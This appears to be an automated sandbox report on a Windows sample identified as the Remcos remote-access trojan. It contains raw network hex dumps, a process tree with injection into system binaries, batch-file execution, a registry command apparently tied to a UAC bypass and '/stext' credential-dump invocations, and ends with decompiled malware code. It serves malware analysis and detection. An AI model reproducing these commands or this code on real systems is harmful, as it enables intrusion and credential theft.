                                        2021-09-22 19:00:56 UTC1579INData Raw: 5f 7d 94 9f 5b ad b1 17 89 11 80 6f 9a 9b da 69 3e c7 f6 69 4d 05 58 e8 0f 79 d8 ac 3f 1c 06 55 62 de 71 4f 78 16 0b 14 3e 5c 38 43 06 6d 41 3a ce 53 b7 72 21 4d b8 d2 e5 3b af 9e 41 a2 f4 ef 25 65 25 fa fa 80 ec 04 0e 3d ad 8d 80 8b 74 18 44 6f 01 2d cc 31 48 05 8b f7 2b ae 0c e1 78 a9 bf 4a e6 ae 9c ac 07 5c 18 c4 71 05 80 39 b3 a8 b3 88 91 ca 82 6c 45 bd e8 b5 a5 03 f7 03 86 7c 18 09 e3 bf 70 a2 59 54 8c 71 4d a2 3a 31 c5 70 51 68 65 ff fc 36 48 2e ef 87 30 33 33 fb 77 d3 9c a4 b6 d8 a8 da d3 62 28 b9 8c 8e f2 bb ec 95 9e 56 f5 db 67 58 40 d3 da a1 df 3c 09 68 cc f3 ef 07 37 b8 25 a3 3c a7 ee d3 ca 5a 66 4b 14 1a e6 27 68 5d e9 a9 35 37 29 79 8c 8e 86 36 f4 2c b0 90 b1 c2 f7 ab 7e 17 02 14 45 4e fa 31 05 ef d9 e9 f2 50 fe 3a f0 70 44 a4 88 59 92 ce 01
                                        Data Ascii: _}[oi>iMXy?UbqOx>\8CmA:Sr!M;A%e%=tDo-1H+xJ\q9lE|pYTqM:1pQhe6H.033wb(VgX@<h7%<ZfK'h]57)y6,~EN1P:pDY
                                        2021-09-22 19:00:56 UTC1595INData Raw: 2b a6 ea 63 ed 5e 4d 50 bb e3 ef fd bd e7 98 bb 2d b9 34 dd f7 60 71 2a ee dc 60 2d 77 58 40 d3 d9 22 ca f6 97 9d 1d e7 c8 ae cc 24 26 a3 f8 6d 9e 13 d9 20 f1 ee a8 da 2c f1 2c bf 19 53 45 55 65 e9 45 99 e0 47 c0 1b 5b 86 31 b0 80 8b ba 6d 52 46 61 5c e7 36 ca e1 44 1a f5 7f 0d bc ce 54 8c 80 0d ed bf 71 c6 00 cf 11 fa 59 e7 f3 e2 3d 55 21 9d 29 05 86 4f 7c 5e 1d be 6b b6 df 8f 8b ff b9 43 c6 a1 2e 43 27 e3 a7 61 28 b3 23 97 e1 30 44 b1 db 56 46 61 f4 32 ee 8b 3b d3 70 cf c1 b6 de cc cc 0a a5 bb 6b c0 33 ba 27 06 8c 76 90 89 11 02 1d cc cd bc 29 c9 55 89 fb f4 65 14 b3 dd b8 94 97 f3 61 c5 78 22 99 f4 e7 ae c0 87 3c 2c d6 f3 69 25 e3 e2 d8 ac 9c fa 2e 44 a1 a4 50 15 02 aa 91 3d bc 29 d6 dd cc 62 ce 41 ba a3 bf 8e 78 28 df 5f cf 7c 1b 80 67 f1 2e 49 07 cf
                                        Data Ascii: +c^MP-4`q*`-wX@"$&m ,,SEUeEG[1mRFa\6DTqY=U!)O|^kC.C'a(#0DVFa2;pk3'v)Ueax"<,i%.DP=)bAx(_|g.I
                                        2021-09-22 19:00:56 UTC1611INData Raw: 11 a8 5b 1d 54 59 cd af 1d f0 44 6f c6 43 e9 1b 80 9b 6f 49 39 42 94 93 15 86 f7 ff 88 69 a9 02 a2 4e 04 c9 2f de cb 74 5d cd 67 b0 91 21 e8 eb d0 a4 b6 98 bd 4c fb 7f e5 ae 9c 50 bb e5 cf 6c 7e a5 cc 78 df 93 65 6c be ee 57 8e e3 57 4d f3 34 4a c0 86 70 1b 30 8e f3 22 1e 6e be 38 21 f0 a0 e8 c1 a3 bf 35 37 b7 da 24 eb 5a cc 86 8e 0d 10 3e 5e 4a a7 6f 36 01 51 6c b0 85 62 e5 d4 4e 05 d3 17 90 1a 4b 8c 7e bf 77 3b c2 f7 ab c8 c7 42 6b 7a 01 2c ac a4 35 25 f8 e6 15 3d de f7 b0 6f de 57 0d 8a a5 b3 05 1b 80 a4 ed 95 09 a8 3d 33 e7 43 31 3b 10 fe b9 f4 a7 fc 45 66 6e cd 4c 35 47 2b a6 2a 68 68 6d 41 a0 34 f5 0f f8 3e 5c de bf a9 ca fb 7f b3 05 db ee da ef 49 ac 07 ec c3 79 d0 d4 42 0c e1 ee c7 41 9e 9a a0 dd dd e6 46 e8 4a f2 9f d4 e0 c6 00 50 fe 7a 2e d2 7f
                                        Data Ascii: [TYDoCoI9BiN/t]g!LPl~xelWWM4Jp0"n8!57$Z>^Jo6QlbNK~w;Bkz,5%=oW=3C1;EfnL5G+*hhmA4>\IyBAFJPz.
                                        2021-09-22 19:00:56 UTC1627INData Raw: 52 fc 88 a8 37 a0 52 fc 39 b6 35 43 23 37 98 3a cf 26 a3 71 e3 5b 9b a9 56 7f 3d 6e 50 a8 41 6e cb 4d f3 29 a2 66 a5 1e e5 1f 96 67 3b aa 48 34 4a a6 ec 00 c0 30 e3 e1 e4 be 10 a2 70 ac 38 35 13 cb 63 a8 ff d7 dd 13 f8 df b7 1a af 56 06 d6 34 b5 83 d5 ad 1f ec 63 23 da a7 f7 60 f6 e2 1b 7f 3e 52 f3 69 4f f7 32 36 92 d8 74 8d 88 79 d0 d4 42 b9 3d 0e 30 44 b1 d9 51 c5 f5 1b 5e 94 6b fc ff 65 b8 b2 2b 35 c8 c2 7c 95 9f e2 0e be 65 a4 f3 69 4a 0f 22 81 01 2d cd df 3b b8 e1 fb 8a 71 67 b1 e0 39 09 c4 d4 12 fc 61 dd b0 3b 4b 05 a4 49 90 75 c7 ff 7d ea 3a ce 1d 72 ca 1a f4 66 c5 69 c7 02 54 07 df bf 0c eb da 59 6d b2 a9 c2 07 54 dd 39 1a db 56 cf 17 ee dc 65 6c b0 13 a4 53 0e 35 1d 17 53 7a 52 88 85 b7 d4 f9 ba 6c 6b eb 48 2b a6 e3 40 24 61 ea a7 69 b2 a1 c7 c7
                                        Data Ascii: R7R95C#7:&q[V=nPAnM)fg;H4J0p85cV4c#`>RiO26tyB=0DQ^ke+5|eiJ"-;qg9a;KIu}:rfiTYmT9VelS5SzRlkH+@$ai
                                        2021-09-22 19:00:56 UTC1643INData Raw: 35 af 3d c9 a9 75 ce 11 b5 4a e5 b6 b8 95 65 cd eb 90 f9 88 17 6b cb ff af 07 d0 19 06 1c bc 2a 3b 50 fe 09 86 07 ac a6 d6 60 26 a3 34 c1 34 f1 52 03 97 28 f3 96 f9 8a 09 90 e3 cc 7f 80 37 2c d5 c2 96 f1 ac a2 c5 10 3a 9a b5 5c 18 c5 4f ec 27 4b 16 f4 17 6b ca 7b b9 34 a5 5d f8 0c 0c 18 e1 cf fa 38 9e bc ea 4f 7c 5a 14 3b 41 4a f1 de 34 c0 f3 e2 3d 55 89 f5 e7 89 a1 53 85 b3 0e 26 a3 75 96 a3 34 80 3e fb f4 25 78 4a f1 9e 92 1e 91 4c cd fb f4 24 a0 85 f2 20 ab 71 c6 40 e5 f4 64 6b e0 d5 a1 6f fc 56 0b a9 71 de 34 c1 75 c3 79 99 2f 40 db ae cc 0d ec 53 85 f2 60 21 18 84 70 05 ea df b7 1e a0 c9 86 74 4d 78 56 4a c1 90 8a 3c e2 69 b5 1b 86 74 4d 78 56 0b e8 4a f9 ef 98 ab 9c e2 3d 55 89 fb f4 64 ea 4f 7c 5e 1d 0f f0 5c 18 84 70 44 e5 c4 bd 5c d5 a1 6e 70 87
                                        Data Ascii: 5=uJek*;P`&44R(7,:\O'Kk{4]8O|Z;AJ4=US&u4>%xJL$ q@dkoVq4uy/@S`!ptMxVJ<itMxVJ=UdO|^\pD\np
                                        2021-09-22 19:00:56 UTC1659INData Raw: cf 7c 5e 5d 68 bf c9 86 34 2d c2 4d 2d 32 f8 5a a8 1d 56 f4 9b dd fd 10 73 8b 0c ee ef d9 e9 20 65 16 d5 a1 6a 00 e8 e9 95 ea b0 2f 53 6d be ae 3f 25 98 9b 62 ca f9 55 dc 30 fd cf 20 36 9c 5b 69 4a 8a 95 15 bd 9f 5f 27 25 60 cd 6b 03 83 ee 12 40 6b 1a d1 67 4f 83 7f 0d ec 13 0a 09 5b 96 d7 49 8b 45 33 3f 1c ba 4a 52 5a eb 2e 4b d4 f7 eb 91 ff a4 0e 6e 00 bc 5e a7 69 49 2a 22 65 53 fe 84 98 9b 62 d5 e9 a4 e7 24 15 a8 2e 77 8e df ec 0d 10 36 4e 06 00 d9 aa b6 dd 4e 87 75 33 7a d3 63 57 f2 49 87 a6 46 a8 35 4b 36 4e ac de 40 db 52 7b 5f 97 5c 93 ed 88 f0 ac 4c 2c 3b 06 0e 3f b5 d0 43 a2 3a ce 54 40 d3 b9 9b e2 b6 dd f7 ac cb ae 33 ff 77 d3 d9 ee 47 4e 05 1b 80 67 f5 a0 b9 41 a1 bf 71 d6 e1 e6 1f 48 2e 3f a9 aa 3c 2c e2 02 bd af b1 ad 10 7e 8b 03 93 9c a4 f6
                                        Data Ascii: |^]h4-M-2ZVs ej/Sm?%bU0 6[iJ_'%`k@kgO[IE3?JRZ.Kn^iI*"eSb$.w6NNu3zcWIF5K6N@R{_\L,;?C:T@3wGNgAqH.?<,~
                                        2021-09-22 19:00:56 UTC1675INData Raw: 2c c4 34 3f 43 16 c4 d0 c9 a2 4e c4 b8 6b 90 61 a3 34 c1 74 f2 bb 5b 66 a5 6f 94 c0 63 6b e2 63 f7 b1 91 87 f7 58 17 fd fc 03 f2 64 10 8c 87 b2 5e 1a 03 d9 d5 a6 81 16 7f 7e 6c d3 5a 9f d4 e0 c7 24 76 97 92 59 19 dd 81 19 8d f9 64 0e 62 ae 9d 71 90 d9 a9 01 5f 5c 45 3f 00 0b b6 82 a8 35 b3 bd 93 ee c6 b2 3d 96 68 cc 95 95 fd 00 15 70 44 a4 07 a3 5c 08 e8 2e ed 8c db 6e 73 ca ba e0 38 35 bc 71 9f c3 be 65 a7 49 af cb 74 b2 03 ae 24 59 19 fe 2f bd 93 ee ca c7 6a cb ce 9a b6 56 c3 f2 9f d4 84 0a 8d c4 77 83 16 c5 f3 1d f0 a3 21 f0 a0 e8 c1 a3 bf 4b 07 20 10 a8 8d 23 95 71 f6 96 f3 e2 7d 50 8b 97 4c 36 f6 95 50 77 21 93 e8 c1 8d 5e 94 48 de 63 fe 29 d1 5c 9b ce 9a f5 e7 88 f4 64 2e 76 0c 8f 83 b5 05 84 87 b3 dc 31 cc 48 2b 1d 86 12 8f 4d f3 fa f8 91 49 e4 43
                                        Data Ascii: ,4?CNka4t[fockcXd^~lZ$vYdbq_\E?5=hpD\.ns85qeIt$Y/jVw!K #q}PL6Pw!^Hc)\d.v1H+MIC
                                        2021-09-22 19:00:56 UTC1691INData Raw: a3 bf 71 83 a8 de 11 0a a5 b3 56 4e bc 8e a3 cb 4b f8 6d fb b2 bc cf 6b 79 53 85 b7 19 6a 12 88 b9 ef d9 ec 15 8d 26 5c d8 ac c7 c7 c4 88 5c e7 08 ea 4f 39 0a 1d 2a 54 c7 09 e3 fa 37 34 e4 be 2e 3f 59 d7 e3 3f 7c a1 ef 52 03 93 57 0a 40 24 5e 96 97 5c 5e 95 30 47 ab ce 11 b0 96 1b 2e 4b b3 dd b2 91 4a 61 86 8b 3f d2 1a cd c9 12 52 fc b6 56 0b ad 0f 68 16 7f 25 ab 45 23 5a 88 5c e7 08 ea 4f 39 0a c5 5b 69 75 44 e4 04 1e 35 66 d1 58 9b 22 df f1 76 74 b2 14 f0 5c 5d dd 1e b4 26 63 23 1c c8 42 50 db 51 40 50 fe 3f 1f a7 19 f9 2f bd 6c 7e 25 98 be 11 35 c8 04 1d 49 d3 b9 9b e2 b6 dd f7 ad 89 de cb 4b f8 6d fb b2 10 56 f4 a4 3d 55 cc 4b bb 4d 87 36 4e fa 34 87 3a eb 2e 74 c6 00 15 bb b8 c4 03 16 0b e8 0f b6 35 66 d1 58 9b 22 df f1 3e f2 9f eb 5a 14 3e 91 d8 02
                                        Data Ascii: qVNKmkySj&\\O9*T74.?Y?|RW@$^\^0G.KJa?RVh%E#Z\O9[iuD5fX"vt\]&c#BPQ@P?/l~%5IKmV=UKM6N4:.t5fX">Z>
                                        2021-09-22 19:00:56 UTC1707INData Raw: db ae cc 11 2c 58 d6 a8 ee 57 8e 9c 45 8e 40 50 fe 3a e1 5f 87 b5 9c a4 b6 dd 32 b5 18 43 64 69 3c b5 5b d3 8c b9 c4 3c e0 ee e7 cc 4e 3d 33 2b 6e c9 86 74 4c ba 65 21 18 84 73 db 46 e8 4a f0 10 c9 4f 4f bf fa a9 ca fb 7f b3 05 18 59 79 27 da cc f2 88 ae 7c 5a 52 c4 9a 4a 1a 88 79 d8 4e 42 37 f8 69 f3 25 46 17 fd 18 fb 1c bb 97 da 72 89 ca 09 a3 1b 73 eb 97 de 33 4a f3 1a 0b f8 19 c6 85 0d 13 19 ac 2f 00 af 59 e6 91 bd 68 4d f9 89 fd 71 ff 88 86 8c 02 ab ba 06 8d eb 24 f4 66 c5 8a 17 06 28 a7 79 eb 31 c5 ff f2 8b 09 89 ff 88 ae 7e 67 ce 90 ec 47 2d bb 68 73 e4 35 67 f6 ae cc 0d ec d3 94 d5 66 2e b4 d8 6b 3f d4 22 71 b0 a5 70 bb 97 f8 46 00 66 d1 98 9b 22 1a 0c 65 ec ac 38 2b 6c d3 aa 3c 83 3e fe 7a 30 ba 8c 6e ab 05 d8 53 8b ff fc 77 9f 2d 8e 06 36 b6 0d
                                        Data Ascii: ,XWE@P:_2Cdi<[<N=3+ntLe!sFJOOYy'|ZRJyNB7i%Frs3J/YhMq$f(y1~gG-hs5gf.k?"qpFf"e8+l<>z0nSw-6


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: g4E1F7Lc2O.exe PID: 7028 Parent PID: 588

                                        General

                                        Start time:20:59:16
                                        Start date:22/09/2021
                                        Path:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\g4E1F7Lc2O.exe'
                                        Imagebase:0x400000
                                        File size:1017856 bytes
                                        MD5 hash:7274D6C1A7DC0A091E1A801165F879CD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: logagent.exe PID: 3228 Parent PID: 7028

                                        General

                                        Start time:20:59:46
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\logagent.exe
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 6520 Parent PID: 7028

                                        General

                                        Start time:20:59:55
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 1572 Parent PID: 6520

                                        General

                                        Start time:20:59:55
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 6108 Parent PID: 6520

                                        General

                                        Start time:20:59:56
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 4500 Parent PID: 6108

                                        General

                                        Start time:20:59:57
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 1496 Parent PID: 7028

                                        General

                                        Start time:20:59:57
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 4612 Parent PID: 1496

                                        General

                                        Start time:20:59:57
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: reg.exe PID: 2792 Parent PID: 1496

                                        General

                                        Start time:20:59:58
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:reg delete hkcu\Environment /v windir /f
                                        Imagebase:0x3d0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: Bkmhwql.exe PID: 4972 Parent PID: 3424

                                        General

                                        Start time:20:59:58
                                        Start date:22/09/2021
                                        Path:C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
                                        Imagebase:0x400000
                                        File size:1017856 bytes
                                        MD5 hash:7274D6C1A7DC0A091E1A801165F879CD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 20%, ReversingLabs

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 5048 Parent PID: 2792

                                        General

                                        Start time:20:59:58
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: logagent.exe PID: 7016 Parent PID: 3228

                                        General

                                        Start time:21:00:00
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: logagent.exe PID: 5588 Parent PID: 3228

                                        General

                                        Start time:21:00:00
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: logagent.exe PID: 5628 Parent PID: 3228

                                        General

                                        Start time:21:00:01
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: Bkmhwql.exe PID: 6612 Parent PID: 3424

                                        General

                                        Start time:21:00:06
                                        Start date:22/09/2021
                                        Path:C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
                                        Imagebase:0x400000
                                        File size:1017856 bytes
                                        MD5 hash:7274D6C1A7DC0A091E1A801165F879CD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi

                                        Chronological Activities

                                        Analysis Process: wscript.exe PID: 6492 Parent PID: 3228

                                        General

                                        Start time:21:00:34
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs'
                                        Imagebase:0x1360000
                                        File size:147456 bytes
                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: DpiScaling.exe PID: 5800 Parent PID: 4972

                                        General

                                        Start time:21:01:00
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\DpiScaling.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\DpiScaling.exe
                                        Imagebase:0xdd0000
                                        File size:77312 bytes
                                        MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: g4E1F7Lc2O.exe PID: 7028 Parent PID: 588 g4E1F7Lc2O.exeCOMMON

                                          Executed Functions

                                          Non-executed Functions

                                          Function 031B7A52, Relevance: .1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.662883916.00000000031B4000.00000004.00000001.sdmp, Offset: 031B4000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42c2d31a1f3ce3c07fea36386aee4fced5d4078aa73f8719f66d1c6b7671a9f7
                                          • Instruction ID: 987e234ec79dd56a6d132023b379b8811d67d2976d9ad1c2c6aaf5d7659a658d
                                          • Opcode Fuzzy Hash: 42c2d31a1f3ce3c07fea36386aee4fced5d4078aa73f8719f66d1c6b7671a9f7
                                          • Instruction Fuzzy Hash: 15315E76E042097FEB25DAF8C888FEEB7BD9F4C300F4445A1E154E7180D7B8AA598B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 031B4D2C, Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.662883916.00000000031B4000.00000004.00000001.sdmp, Offset: 031B4000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: l.@$p.@$p.@$3C
                                          • API String ID: 0-542283486
                                          • Opcode ID: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
                                          • Instruction ID: bbba202e9c998eb4e81279ba2b2a589c436b52fed7e8bc64fcca3b21c8ead4e7
                                          • Opcode Fuzzy Hash: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
                                          • Instruction Fuzzy Hash: 17419234100700ABE730DF26C808BE2B6F5EB0C750F24CE2DD1E69A5D2EB7998958795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: logagent.exe PID: 3228 Parent PID: 7028 logagent.exeCOMMON

                                          Executed Functions

                                          Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040CD09() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bb04 = _t24;
				return _t24;
			}






                                          0x0040cd1c
                                          0x0040cd25
                                          0x0040cd2d
                                          0x0040cd34
                                          0x0040cd45
                                          0x0040cd45
                                          0x0040cd60
                                          0x0040cd65
                                          0x0040cd76
                                          0x0040cd76
                                          0x0040cd94
                                          0x0040cda8
                                          0x0040cdbc
                                          0x0040cdd0
                                          0x0040cde4
                                          0x0040cdf8
                                          0x0040ce0c
                                          0x0040ce20
                                          0x0040ce31
                                          0x0040ce39
                                          0x0040ce3d
                                          0x0040ce43

                                          APIs
                                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Octopus-GM39UT,00000001,0040C505), ref: 0040CD1C
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD25
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD43
